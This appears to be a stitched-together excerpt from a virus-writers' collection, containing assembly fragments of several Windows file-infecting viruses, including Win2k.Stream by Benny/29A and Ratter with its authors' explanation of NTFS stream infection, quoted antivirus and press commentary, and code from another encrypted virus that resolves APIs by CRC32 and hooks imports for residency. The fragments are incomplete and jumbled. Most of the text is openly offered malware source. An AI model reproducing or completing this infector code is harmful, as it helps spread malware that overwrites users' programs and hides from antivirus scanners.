DB 038H,03CH,038H,044H,038H,04DH,038H,056H,038H,069H,038H,070H,038H,075H,038H
DB 082H,038H,087H,038H,0A6H,038H,0F8H,038H,0FDH,038H,01EH,039H,025H,039H,038H
DB 039H,056H,039H,062H,039H,068H,039H,087H,039H,0A4H,039H,0ABH,039H,0B2H,039H
DB 0D0H,039H,0D7H,039H,0EAH,039H,006H,03AH,012H,03AH,027H,03AH,02EH,03AH,0A4H
DB 03AH,0ABH,03AH,0CBH,03AH,0D0H,03AH,0E1H,03AH,0E8H,03AH,01CH,03BH,022H,03BH
DB 049H,03BH,05DH,03BH,094H,03BH,09BH,03BH,0BAH,03BH,0EAH,03BH,0F4H,03BH,00DH
DB 03CH,027H,03CH,048H,03CH,071H,03CH,07FH,03CH,0B8H,03CH,0BFH,03CH,0D4H,03CH
DB 0DBH,03CH,01AH,03DH,035H,03DH,06CH,03DH,085H,03DH,0F0H,03DH,01BH,03EH,024H
DB 03EH,029H,03EH,02FH,03EH,03AH,03EH,09CH,03EH,0A2H,03EH,0FBH,03EH,03FH,03FH
DB 000H,000H,000H,020H,000H,000H,040H,001H,000H,000H,024H,030H,045H,030H,0B2H
DB 030H,0F2H,030H,006H,031H,014H,031H,022H,031H,05AH,031H,078H,031H,088H,031H
DB 09AH,031H,0BCH,031H,0DAH,031H,0E0H,031H,0FFH,031H,00CH,032H,011H,032H,01FH
DB 032H,028H,032H,04EH,032H,053H,032H,05AH,032H,07CH,032H,0C2H,032H,0D5H,032H
DB 0DFH,032H,0EAH,032H,0F4H,032H,0FFH,032H,008H,033H,022H,033H,029H,033H,048H
DB 033H,04CH,033H,050H,033H,054H,033H,058H,033H,074H,033H,081H,033H,086H,033H
DB 08CH,033H,091H,033H,0B5H,033H,0C2H,033H,0D0H,033H,0E0H,033H,0ECH,033H,00AH
DB 034H,010H,034H,061H,034H,088H,034H,09EH,034H,0AFH,034H,0BFH,034H,0CCH,034H
DB 00CH,035H,031H,035H,055H,035H,061H,035H,070H,035H,085H,035H,0A9H,035H,0C2H
DB 035H,0CBH,035H,0DEH,035H,0EBH,035H,0F4H,035H,01AH,036H,027H,036H,073H,036H
DB 081H,036H,0C2H,036H,0F5H,036H,02AH,037H,049H,037H,059H,037H,061H,037H,07FH
DB 037H,092H,037H,099H,037H,0A1H,037H,0A9H,037H,0B1H,037H,0C5H,037H,0CEH,037H
DB 001H,038H,009H,038H,011H,038H,019H,038H,03CH,038H,071H,038H,090H,038H,0AAH
DB 038H,0B1H,038H,0C8H,038H,0CFH,038H,0D6H,038H,0F0H,038H,022H,039H,038H,039H
DB 03FH,039H,046H,039H,060H,039H,092H,039H,0B6H,039H,0BBH,039H,0D4H,039H,0E7H
DB 039H,00CH,03AH,013H,03AH,021H,03AH,086H,03AH,090H,03AH,0A7H,03AH,0AEH,03AH
DB 0B4H,03AH,0BFH,03AH,0C5H,03AH,0CDH,03AH,0D6H,03AH,0DEH,03AH,0E3H,03AH,0EBH
DB 03AH,0F0H,03AH,002H,03BH,00CH,03BH,024H,03BH,072H,03BH,07CH,03BH,088H,03BH
DB 091H,03BH,09CH,03BH,0AAH,03BH,0B4H,03BH,0C9H,03BH,0DCH,03BH,0E4H,03BH,0FAH
DB 03BH,010H,03CH,02FH,03CH,047H,03CH,06BH,03CH,0B7H,03CH,0C4H,03CH,0C9H,03CH
DB 0EFH,03CH,0FEH,03CH,010H,03DH,021H,03DH,020H,03EH,03CH,03EH,07FH,03EH,069H
DB 03FH,079H,03FH,0B4H,03FH,0BEH,03FH,000H,030H,000H,000H,040H,000H,000H,000H
DB 018H,030H,030H,030H,0C8H,030H,07FH,031H,0AAH,031H,0C6H,031H,0D8H,032H,0F0H
DB 032H,076H,033H,080H,033H,0B9H,033H,01FH,034H,02CH,034H,051H,034H,0B8H,034H
DB 0C8H,034H,0E8H,034H,011H,035H,056H,035H,06FH,035H,0B7H,035H,0DEH,035H,0F9H
DB 035H,027H,036H,033H,036H,076H,036H,088H,036H,0B1H,036H,000H,050H,000H,000H
DB 058H,000H,000H,000H,00CH,030H,018H,030H,03CH,030H,068H,030H,08CH,035H,094H
DB 035H,09CH,035H,0A4H,035H,0ACH,035H,0B4H,035H,0BCH,035H,0C4H,035H,0CCH,035H
DB 0D4H,035H,0DCH,035H,0E4H,035H,0ECH,035H,0F4H,035H,0FCH,035H,004H,036H,00CH
DB 036H,07CH,036H,09CH,036H,0ACH,036H,0BCH,036H,028H,038H,030H,038H,0E0H,03AH
DB 0E4H,03AH,0E8H,03AH,088H,03CH,08CH,03CH,090H,03CH,094H,03CH,098H,03CH,09CH
DB 03CH,0A0H,03CH,0A4H,03CH,0A8H,03CH,0ACH,03CH,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
MACROSIZE
align 4
CreateFile DD 0
CloseHandle DD 0
FindFirstFile DD 0
FindNextFile DD 0
ReadFile DD 0
MapViewOfFile DD 0
UnmapViewOfFile DD 0
CreateFileMappingA DD 0
LoadLibraryA DD 0
FreeLibraryA DD 0
WriteFileA DD 0
DeleteFileA DD 0
GPA DD 0
SearcHandle DD 0
FileHandle DD 0
NewSize DD 0
MapHandle DD 0
MapAddress DD 0
BYTES DD 0
FILETIME STRUC
FT_dwLowDateTime DD ?
FT_dwHighDateTime DD ?
FILETIME ENDS
Win32FindData:
WFD_dwFileAttributes DD ?
WFD_ftCreationTime FILETIME ?
WFD_ftLastAccessTime FILETIME ?
WFD_ftLastWriteTime FILETIME ?
WFD_nFileSizeHigh DD ?
WFD_nFileSizeLow DD ?
WFD_dwReserved0 DD ?
WFD_dwReserved1 DD ?
FNAME DB MAX_PATH DUP (?)
WFD_szAlternateFileName DB 13 DUP (?)
DB 03 DUP (?)
DB 0100h dup (0)
align 4
EXITPROC:
PUSH 0
CALL ExitProcess
ENDS
END MEGAMIX
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[ADONAI.ASM]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[CALLGATE.TXT]ÄÄÄ
Run any Ring 0 code from a WIN32 application on Windows NT
-----------------------------------------------------------
Copyright (C) 1997 Prasad Dabak & Sandeep Phadke & Milind Borate
Background
----------
Implementation
--------------
How to Contact us
-----------------
Prasad : pdabak@cyberspace.org
Sandeep : sandeep@giaspn01.vsnl.net.in
Milind : milind@cyberspace.org
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[CALLGATE.TXT]ÄÄÄ
COMMENT#
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Win2k.Stream ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ by Benny/29A and Ratter ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Let us introduce very small and simple infector presenting how to use features
of NTFS in viruses. This virus loox like standard Petite-compressed PE file.
However, it presents the newest way of PE file infecting method.
How the virus worx? It uses streamz, the newest feature of NTFS filesystem
and file compression, already implemented in old NTFS fs.
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Basic principles of NTFS streamz ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
How the file loox? Ya know that the file contains exactly the same what you can
see when you will open it (e.g. in WinCommander). NTFS, implemented by
Windows 2000, has new feature - the file can be divided to streamz. The content
what you can see when you will open the file is called Primary stream - usually
files haven't more than one stream. However, you can create NEW stream ( = new
content) in already existing file without overwritting the content.
Example:
If you have NTFS, you can test it. Copy to NTFS for instance "calc.exe", and
then create new file "calc.exe:stream" and write there "blahblah". Open
"calc.exe". Whats there? Calculator ofcoz. Now open "calc.exe:stream". Whats
there? "blahblah", the new file in the old one :)
The virus infects file by moving the old content to the new stream and replacing
the primary stream with virus code.
ÉÍCalc.exeÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄPrimary stream (visible part)Ä¿º
º³ Calculator ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
ÉÍCalc.exeÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄPrimary stream (calc.exe)Ä¿ÚÄNext stream (calc.exe:STR)Ä¿ º
º³ Virus ³³ Calculator ³ º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
* If user will copy the infected file to non-NTFS partition (in this case
only primary stream is copied), the host program will be destroyed and
instead of running host program virus will show message box. That can
be also called as payload :P
* The virus is very small, exactly 3628 bytes, becoz it's compressed by
Petite 2.1 PE compression utility (http://www.icl.ndirect.co.uk/petite/).
* This virus was coded in Czech Republic by Benny/29A and Ratter, on our
common VX meeting at Ratter's city... we just coded it to show that
Windows 2000 is just another OS designed for viruses... it really is :)
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ In the media ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
AVP's description:
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
This is the first known Windows virus using the "stream companion" infection
method. That method is based on an NTFS feature that allows to create multiple
data streams associated with a file.
*NTFS Streams*
---------------
Each file contains at least one default data stream that is accessed just by
the file name. Each file may also contain additional stream(s) that can be
accessed by their personal names (filename:streamname).
The default file stream is the file body itself (in pre-NTFS terms). For
instance, when an EXE file is executed the program is read from the default
file stream; when a document is opened, its content is also read from the
default stream.
Additional file streams may contain any data. The streams cannot be accessed or
modified without reference to the file. When the file is deleted, its streams
are deleted as well; if the file is renamed, the streams follow its new name.
*Virus Details*
----------------
The virus itself is a Windows application (PE EXE file) compressed using the
Petite PE EXE file compressor and is about 4K in size. When run it infects all
EXE files in the current directory and then returns control to the host file.
If any error occurs, the virus displays the message:
While infecting a file the virus creates a new stream associated with the victim
file. That stream has the name "STR", i.e. the complete stream name is
"FileName:STR". The virus then moves the victim file body to the STR stream
(default stream, see above) and then overwrites the victim file body (default
stream) with its (virus) code.
As a result, when an infected file is executed Windows reads the default stream
(which is overwritten by virus code) and executes it. Also, Windows reports the
same file size for all infected files - that is the virus length.
To release control to the host program the virus just creates a new process by
accessing the original file program using the name "FileName:STR".
That infection method should work on any NTFS system, but the virus checks the
system version and runs only under Win2000.
The virus originates from the Czech Republic and was created at the end of
August by the hackers going by the pseudonyms of Benny and Ratter. To date,
Kaspersky Lab has not registered any infections resulting from this virus;
however, its working capacity and ability for existence "in-the-wild" are
unchallenged.
"Certainly, this virus begins a new era in computer virus creation," said
Eugene Kaspersky, Head of Anti-Virus Research at Kaspersky Lab. "The ’Stream
Companion’ technology the virus uses to plant itself into files makes its
detection and disinfection extremely difficult to complete.”
Unlike previously known methods of file infection (adding the virus body at
beginning, ending or any other part of a host file), the "Stream" virus
exploits the NTFS file system (Windows NT/2000) feature, which allows multiple
data streams. For instance, in Windows 95/98 (FAT) files, there is only one
data stream – the program code itself. Windows NT/2000 (NTFS) enables users
to create any number of data streams within the file: independent executable
program modules, as well as various service streams (file access rights,
encryption data, processing time etc.). This makes NTFS files very flexible,
allowing for the creation of user-defined data streams aimed at completing
specific tasks.
"Stream" is the first known virus that uses the feature of creating multiple
data streams for infecting files of the NTFS file system (see picture 1). To
complete this, the virus creates an additional data stream named "STR" and
moves the original content of the host program there. Then, it replaces the
main data stream with the virus code. As a result, when the infected program
is run, the virus takes control, completes the replicating procedure and then
passes control to the host program.
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³°°°°°°°°°°°°°°°°°°°³ ³°°°°°°°°°°°°°°°°°°°³
³°°°°°°°°°°°°°°°°°°°³ ³°°° main stream°°°°³
³°°°°°°°°°°°°°°°°°°°³ ³°°° virus body°°°°°³
³°°°°main stream°°°°³ ³°°°°°°°°°°°°°°°°°°°³
³°°°°°°°°°°°°°°°°°°°³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³°°°°program body°°°³ ³°°°°°°°°°°°°°°°°°°°³
³°°°°°°°°°°°°°°°°°°°³ ³°additional stream°³
³°°°°°°°°°°°°°°°°°°°³ ³°°°program body°°°°³
³°°°°°°°°°°°°°°°°°°°³ ³°°°°°°°°°°°°°°°°°°°³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³±±±±±±±±±±±±±±±±±±±³ ³±±±±±±±±±±±±±±±±±±±³
³±±service streams±±³ ³±±service streams±±³
³±±±±±±±±±±±±±±±±±±±³ ³±±±±±±±±±±±±±±±±±±±³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
"By default, anti-virus programs check only the main data stream. There will be
no problems protecting users from this particular virus," Eugene Kaspersky
continues. "However, the viruses can move to additional data streams. In this
case, many anti-virus products will become obsolete, and their vendors will be
forced to urgently redesign their anti-virus engines."
In MSNBC's news:
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Sept. 6 — A new kind of computer virus has been released, but security experts
are in disagreement over just how menacing it is. The virus demonstrates a
technique that future writers can use to hide their malicious software from
most current antivirus scanners. But some antivirus companies are playing down
the threat.
The virus takes advantage of a little-used feature included in Windows 2000 and
older Windows NT systems that allows programs to be split into pieces called
streams. Generally, the body of a program resides in the main stream. But other
streams can be created to store information related to what’s in the main
stream. Joel Scambray, author of “Hacking Exposed,” described these additional
streams as “Post-it notes” attached to the main file.
The problem is that antivirus programs only examine the main stream. W2K.Stream
demonstrates a programmer’s ability to create an additional stream and hide
malicious code there.
“Certainly, this virus begins a new era in computer virus creation,” said
Eugene Kaspersky, Head of Anti-Virus Research at Kaspersky Lab, in a press
release. “The ‘Stream Companion’ technology the virus uses to plant itself into
files makes its detection and disinfection extremely difficult to complete.”
No W2K.stream infections have been reported, and experts don’t believe the
virus is “in the wild” — circulating on the Internet — yet. At any rate, this
virus actually makes things easy for antivirus companies. If a user is
infected, the program creates an alternate stream and places the legitimate
file in this alternate location; the virus replaces it as the main stream. That
makes detection by current antivirus products easy. But future viruses could
do just the opposite, evading current antivirus products.
One antivirus researcher who requested anonymity called release of the bug
“somewhat akin to the first macro virus.” He added that reengineering antivirus
software to scan for multiple streams would be a complicated effort.
“In this case, many anti-virus products will become obsolete, and their vendors
will be forced to urgently redesign their anti-virus engines,” Kaspersky said.
There is nothing new about the potential of exploiting the multiple stream
issue; Scambray hints at the problem in the book “Hacking Exposed,” and
described it even more explicitly in a 1998 Infoworld.com article.
“We found that the scanners were incapable of identifying viruses stored within
an alternate data stream,” the report said. “For example if you create the file
MyResume.doc:ILOVEYOU.vbs and store the contents of the I Love You virus within
the alternate data stream file, none of the tested virus scanners were capable
of finding the virus during a complete disk scan.”
But some antivirus companies described the threat as minimal because the
alternate stream trick only hides the bug while it’s stored on a victim’s
computer. Pirkka Palomaki, Director of Product Marketing for F-Secure Corp.,
said for the virus to actually run, it has to come out of hiding and load into
main memory.
“It could increase the ability to for scanners to miss something,” said Pat
Nolan, virus researcher at McAfee Corp. “But we’re on top of it. If there is
a vulnerability, it will be short-lived.”
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ How to compile it? ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Use Petite version 2.1 (http://www.icl.ndirect.co.uk/petite/).
.586p
.model flat,stdcall
;compression flag
STARTUPINFO STRUCT ;used by CreateProcessA API
cb DWORD ?
lpReserved DWORD ?
lpDesktop DWORD ?
lpTitle DWORD ?
dwX DWORD ?
dwY DWORD ?
dwXSize DWORD ?
dwYSize DWORD ?
dwXCountChars DWORD ?
dwYCountChars DWORD ?
dwFillAttribute DWORD ?
dwFlags DWORD ?
wShowWindow WORD ?
cbReserved2 WORD ?
lpReserved2 DWORD ?
hStdInput DWORD ?
hStdOutput DWORD ?
hStdError DWORD ?
STARTUPINFO ENDS
PROCESS_INFORMATION STRUCT
hProcess DWORD ?
hThread DWORD ?
dwProcessId DWORD ?
dwThreadId DWORD ?
PROCESS_INFORMATION ENDS
.data
search_loop:
call infect ;try to infect file
end_host:
mov esi,offset file_name ;get our filename
push esi
@endsz
dec esi
mov edi,esi
mov eax,"RTS:" ;append there :"STR" stream
stosd ;name
pop esi
end_app:
push 0
call ExitProcess ;exit
next_infect:
push offset [WFD.WFD_szFileName]
mov byte ptr [flagz],OPEN_EXISTING
call Create_File ;open found program
jz infect_end
xor eax,eax
push eax
@pushvar <dd ?>
push eax
push eax
push 4
@pushvar <dd 1> ;default compression
push FSCTL_SET_COMPRESSION
push ebx ;NTFS compress it =
call DeviceIoControl ;mark as already infected
; = and save disk space :)
push ebx
call CloseHandle ;close file handle
push 0
push edi
push offset file_name
call CopyFileA ;copy ourself to victim program
push esi
mov esi,edi
@endsz
xchg esi,edi
dec edi
mov eax,"RTS:" ;append :"STR" stream to
stosd ;victim program filename
xor al,al
stosb
push 0
push ebx
call GetFileSize ;get its size
xchg eax,edi
push PAGE_READWRITE
push MEM_COMMIT or MEM_RESERVE
push edi
push 0
call VirtualAlloc ;allocate enough memory
test eax,eax ;for file content
jz infect_end_handle
xchg eax,esi
xor eax,eax
push eax
@pushvar <file_size dd ?>
push edi
push esi
push ebx
call ReadFile ;read file content to
test eax,eax ;allocated memory
jz infect_end_handle
push ebx
call CloseHandle ;close its file handle
push 0
mov ecx,offset file_size
push ecx
push dword ptr [ecx]
push esi
push ebx
call WriteFile ;write there victim program
test eax,eax
jz infect_end_handle
infect_end_handle:
push ebx
call CloseHandle ;close its file handle
infect_end_dealloc:
push MEM_DECOMMIT
push dword ptr [file_size]
push esi
call VirtualFree ;free allocated memory
push MEM_RELEASE
push 0
push esi
call VirtualFree ;release reserved part of mem
infect_end:
ret
; [esp+4] - file_name
Create_File: ;proc for opening file
xor eax,eax
push eax
push eax
db 6ah
flagz db OPEN_EXISTING ;variable file open flag
push eax
push eax
push GENERIC_READ or GENERIC_WRITE
push dword ptr [esp+1ch]
call CreateFileA ;open file
xchg eax,ebx ;handle to EBX
inc ebx ;is EBX -1?
lahf ;store flags
dec ebx ;correct EBX
sahf ;restore flags
retn 4 ;quit from proc
;
; Some macros and equs
;
; Notice this could work only in my system due the harcoded address of
; MessageBoxA, but this is only for debug in my comp ;)
@debug macro title,reg
pushad
push 1000h
@@tit: @strz title
pop eax
add eax,ebp
push eax
push reg
push 0h
mov eax,0bff5412eh
call eax
popad
endm
.DATA
; dummy data
db 'WARNING - This is a virus carrier - WARNING'
.CODE
inicio: ; now i've realized i ever
; put this label in spanish!
pushad
call getDelta
;
; 99Ways begins here!
;
vBegin label byte
call crypt ; decrypt
cli
call $ ; this will fake the proc
skipFakeProcess:
mov esi,dword ptr [kernel32+ebp] ; test last used
call GetKernel32
jnc getAPIsNow
getAPIsNow:
; now get APIs using CRC32
mov edi,0bff70000h ; coded using win9x
kernel32 equ $-4
; ^ this is a nice way to optimize code and hide data,
; almost all the non-temporary data can be plazed inside code!
mov esi,edi
mov esi,dword ptr [esi+3ch]
add esi,edi
mov esi,dword ptr [esi+78h]
add esi,edi
add esi,1ch
lodsd
add eax,edi
mov dword ptr [address+ebp],eax
lodsd
add eax,edi
mov dword ptr [names+ebp],eax
lodsd
add eax,edi
mov dword ptr [ordinals+ebp],eax
sub esi,16
lodsd
mov dword ptr [nexports+ebp],eax
xor edx,edx
mov dword ptr [expcount+ebp],edx
lea eax,FSTAPI+ebp
searchl:
mov esi,dword ptr [names+ebp]
add esi,edx
mov esi,dword ptr [esi]
add esi,edi
push eax edx edi
xor edi,edi
movzx di,byte ptr [eax+4]
call CRC32
xchg ebx,eax
pop edi edx eax
cmp ebx,dword ptr [eax]
je fFound
add edx,4
inc dword ptr [expcount+ebp]
push edx
mov edx,dword ptr [expcount+ebp]
cmp dword ptr [nexports+ebp],edx
pop edx
je returnHost
jmp searchl
fFound:
shr edx,1
add edx,dword ptr [ordinals+ebp]
xor ebx,ebx
mov bx,word ptr [edx]
shl ebx,2
add ebx,dword ptr [address+ebp]
mov ecx,dword ptr [ebx]
add ecx,edi
lea edi,vBegin+ebp
sub edi,dword ptr [virusEP+ebp]
add dword ptr [imageBase+ebp],edi ; fix relocations
; in the hook routine
lea esi,vBegin+ebp
mov edi,eax
mov ecx,vSize
rep movsb
; jmp into memory copy - put into edi the return address
; for the memory copy
lea edi,vBegin+ebp
add eax,offset memCopy-offset vBegin
push eax
ret
memCopy:
; get delta offset another time for memory copy
call getDelta
; setup the ret to jmp patched virus copy
mov dword ptr [retPatch+ebp],edi
lea edx,dateTime+ebp
push edx
call dword ptr [_GetSystemTime+ebp]
lea edx,dateTime+ebp
mov ax,word ptr [edx+2]
mov bx,-1
countdown equ $-2
; another time
cmp bx,ax ; the day arrived?
jne skipPay
skipPay:
; alloc a temporary buffer to generate the poly sample
; of the virus ready to infect
push 00000004h
push 00001000h OR 00002000h
push (vSize+1000h)
push 0h
call dword ptr [_VirtualAlloc+ebp]
or eax,eax
jz quitFromMem
returnHost:
; patch virus
call patchVirusBody
quitFromMem:
popad
push 1234568h
retPatch equ $-4
ret
xor edi,edi
pop dword ptr fs:[edi]
pop eax
popad
clc
ret
GetKernel32Exception:
xor edi,edi
mov eax,dword ptr fs:[edi]
mov esp,dword ptr [eax]
GetKernel32NotFound:
xor edi,edi
pop dword ptr fs:[edi]
pop eax
popad
stc
ret
;
; This routine makes CRC32.
;
CRC32:
cld
xor ecx,ecx
dec ecx
mov edx,ecx
push ebx
NextByteCRC:
xor eax,eax
xor ebx,ebx
lodsb
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
NextBitCRC:
shr bx,1
rcr ax,1
jnc NoCRC
xor ax,08320h
xor bx,0EDB8h
NoCRC:
dec dh
jnz NextBitCRC
xor ecx,eax
xor edx,ebx
dec edi
jnz NextByteCRC
pop ebx
not edx
not ecx
mov eax,edx
rol eax,16
mov ax,cx
ret
;
; This routine hooks the APIs that gives virus residency.
; Takes care of relocations.
;
hookApi:
pushad
; init the sem to free
mov byte ptr [semHook+ebp],0
mov edx,400000h
imageBase equ $-4
; ;)
cmp word ptr [edx],'ZM'
jne noHook
mov edi,edx
add edi,dword ptr [edx+3ch]
cmp word ptr [edi],'EP'
jne noHook
mov edi,dword ptr [edi+80h] ; RVA import
or edi,edi
jz noHook
add edi,edx
searchK32Imp:
mov esi,dword ptr [edi+0ch] ; get name
or esi,esi
jz noHook
add esi,edx
push edi ; save (stringUp doesn't)
call stringUp
pop edi
jc nextName
lea esi,stringBuffer+ebp
cmp dword ptr [esi],'NREK' ; look for Kernel32 module
jne nextName
cmp dword ptr [esi+4],'23LE'
je k32ImpFound
nextName:
add edi,14h
mov esi,dword ptr [edi]
or esi,esi
jz noHook
jmp searchK32Imp
k32ImpFound:
mov esi,dword ptr [edi+10h] ; get address table
or esi,esi
jz noHook
add esi,edx
lea ecx,HOOKTABLEEND+ebp
nextImp: ; search for APIs
lea edx,HOOKTABLEBEGIN+ebp
lodsd
or eax,eax
jz noHook
checkNextAPI:
mov edi,dword ptr [edx]
cmp eax,dword ptr [edi+ebp]
je doHook
add edx,8
cmp edx,ecx
jne checkNextAPI
